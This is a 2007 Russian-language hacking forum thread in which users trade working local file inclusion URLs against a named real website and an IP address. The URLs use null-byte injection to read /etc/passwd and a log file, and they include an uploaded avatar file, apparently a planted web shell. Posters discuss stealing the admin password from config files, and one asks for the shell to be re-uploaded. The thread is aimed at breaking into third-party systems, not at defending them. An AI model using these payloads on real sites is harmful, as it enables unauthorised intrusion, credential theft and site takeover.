База

Discussion in 'Уязвимости' started by cardons, 9 Jan 2007.

  1. cardons

    cardons Elder - Старейшина

    Joined:
    19 Jul 2005
    Messages:
    778
    Likes Received:
    324
    Reputations:
    83
    Есть вот такая бага
    http://lina2.ru/index.php?d=/etc/passwd%00&p=top&server=1&online=1
    Можно ли как нибудь через неё бэкапнуть базу? Или узнать праоль админа
     
  2. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    я думаю бекап не получится,а вот пасс админа узнать можно если найдешь config и если прова позволят.Тут есть статья про локальный инклуд почитай может что и получится.
     
  3. cardons

    cardons Elder - Старейшина

    Joined:
    19 Jul 2005
    Messages:
    778
    Likes Received:
    324
    Reputations:
    83
    http://62.181.56.104/index.php?server=../error.log%00&
    А с этим можно что нить сделать? Скока несмотрел фидео так и непонял как это замутить.
    По этому ip еще telnet на 80 порту пашет
     
  4. KPOT_f!nd

    KPOT_f!nd положенец общага

    Joined:
    25 Aug 2006
    Messages:
    1,074
    Likes Received:
    502
    Reputations:
    65
    Бага ядовитый %НОЛЬ% - попробуй почитать passwd
     
  5. JFKenedi

    JFKenedi New Member

    Joined:
    10 Jun 2006
    Messages:
    16
    Likes Received:
    4
    Reputations:
    0
    http://lina2.ru/index.php?d=../forum/uploads/av-399.gif%00&p=top&server=1&online=1
    Пользуйся !
     
    1 person likes this.
  6. cardons

    cardons Elder - Старейшина

    Joined:
    19 Jul 2005
    Messages:
    778
    Likes Received:
    324
    Reputations:
    83
    Спасибо!
     
  7. Vallez

    Vallez Elder - Старейшина

    Joined:
    25 Dec 2005
    Messages:
    88
    Likes Received:
    19
    Reputations:
    -8
    перезалейте шел плиз